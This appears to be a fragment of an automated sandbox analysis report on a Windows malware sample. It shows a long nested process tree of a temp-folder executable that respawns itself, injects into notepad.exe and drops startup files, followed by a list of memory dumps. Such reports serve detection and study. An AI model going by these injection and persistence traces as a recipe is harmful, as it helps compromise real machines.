                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                      106⤵
                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                      PID:1908
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                                        107⤵
                                                                                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                                                                                        PID:3648
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                        107⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1544
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1544 263343
                                                                                                                                                                                                                                                                                                                                                          107⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4260
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                              108⤵
                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                              PID:4228
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                                                109⤵
                                                                                                                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                PID:4500
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                                109⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3012
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3012 264781
                                                                                                                                                                                                                                                                                                                                                                  109⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:4460
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                                      110⤵
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                      PID:2744
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                                                        111⤵
                                                                                                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                        PID:4060
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                                        111⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:632
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 632 266203
                                                                                                                                                                                                                                                                                                                                                                          111⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:492
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                                              112⤵
                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                              PID:2044
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                                                                113⤵
                                                                                                                                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                                PID:1080
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                                                113⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:408
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 408 267625
                                                                                                                                                                                                                                                                                                                                                                                  113⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3904
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                                                      114⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                      PID:1308
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                                                                        115⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                                        PID:4504
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                                                        115⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4556
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4556 269078
                                                                                                                                                                                                                                                                                                                                                                                          115⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4636

                                                                                                                                                      Network

                                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                                      Replay Monitor

                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                      Downloads

                                                                                                                                                      • memory/812-6-0x0000000000400000-0x0000000000554000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        1.3MB

                                                                                                                                                      • memory/812-11-0x0000000000400000-0x0000000000554000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        1.3MB

                                                                                                                                                      • memory/1000-103-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-91-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-101-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-102-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-33-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-100-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-98-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-104-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-97-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-93-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-105-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-106-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-108-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-109-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-52-0x00000000055A0000-0x00000000055A1000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-76-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-77-0x0000000005690000-0x0000000005691000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-78-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-79-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-90-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-81-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-83-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-117-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-84-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-85-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-116-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-110-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-115-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-88-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-114-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-111-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-86-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-113-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1000-112-0x0000000003340000-0x0000000003341000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        4KB

                                                                                                                                                      • memory/1836-22-0x0000000000400000-0x0000000000554000-memory.dmp

                                                                                                                                                        Filesize

                                                                                                                                                        1.3MB